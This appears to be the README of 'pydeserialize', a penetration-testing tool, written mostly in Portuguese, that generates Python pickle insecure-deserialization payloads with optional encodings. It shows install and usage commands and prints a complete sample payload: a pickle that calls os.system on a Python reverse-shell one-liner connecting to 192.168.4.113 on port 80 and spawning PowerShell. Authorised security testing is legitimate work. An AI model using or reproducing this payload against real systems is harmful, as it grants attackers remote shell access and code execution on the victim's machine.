Tool for testing python insecure deserialization vulnerabilities
Features • Install • How to use • Usage
O pydeserialize é uma ferramenta que gera payloads de desserialização insegura em python. Possui uma funcionalidade que faz encode das payloads desejadas e dessa forma sendo simples e otimizada para velocidade. pydeserialize é construído para fazer apenas uma coisa - gera payloads de desserialização insegura + encodes e faz isso muito bem.
Projetei o pydeserialize
para cumprir todas as responsabilidades para gera payloads e encodes, mantive um modelo consistentemente passivo para torná-lo útil para testadores de penetração.
Características
- Gera payloads para explora vulnerabilidades de desserialização insegura em python
Forma de utilização
pydeserialize -ip 192.168.4.113 -p 80 -e shell -o Windows
pydeserialize -ip 192.168.4.113 -e b64 -p 80 -o Linux
Isso exibirá a ajuda para a ferramenta. Aqui estão todos os switches que ele suporta:
_ _ _ _
___ _ _ _| |___ ___ ___ ___|_|___| |_|___ ___
| . | | | . | -_|_ -| -_| _| | .'| | |- _| -_|
| _|_ |___|___|___|___|_| |_|__,|_|_|___|___|
|_| |___|
v0.0.7 - @joaoviictorti
options:
-h, --help show this help message and exit
-ip IP Insert ip
-p PORT Insert port
-e {b64,shell,urlencode,hex} Insert encoding
-o {Windows,Linux} Insert operational system
Instalação
pydeserialize requer python3 e para baixá-lo só usar:
pip3 install pydeserialize
Executando pydeserialize
pydeserialize -ip 192.168.4.113 -p 80 -o Windows -e shell
_ _ _ _
___ _ _ _| |___ ___ ___ ___|_|___| |_|___ ___
| . | | | . | -_|_ -| -_| _| | .'| | |- _| -_|
| _|_ |___|___|___|___|_| |_|__,|_|_|___|___|
|_| |___|
v0.0.7 - @joaoviictorti
b'\x80\x04\x95\xf9\x00\x00\x00\x00\x00\x00\x00\x8c\x02nt\x94\x8c\x06system\x94\x93\x94\x8c\xe1python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.4.113",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("powershell")\'\x94\x85\x94R\x94.'